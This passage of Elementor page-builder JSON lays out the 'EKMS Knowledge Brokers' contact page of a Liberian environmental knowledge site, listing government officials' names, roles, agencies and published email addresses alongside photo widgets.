id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National 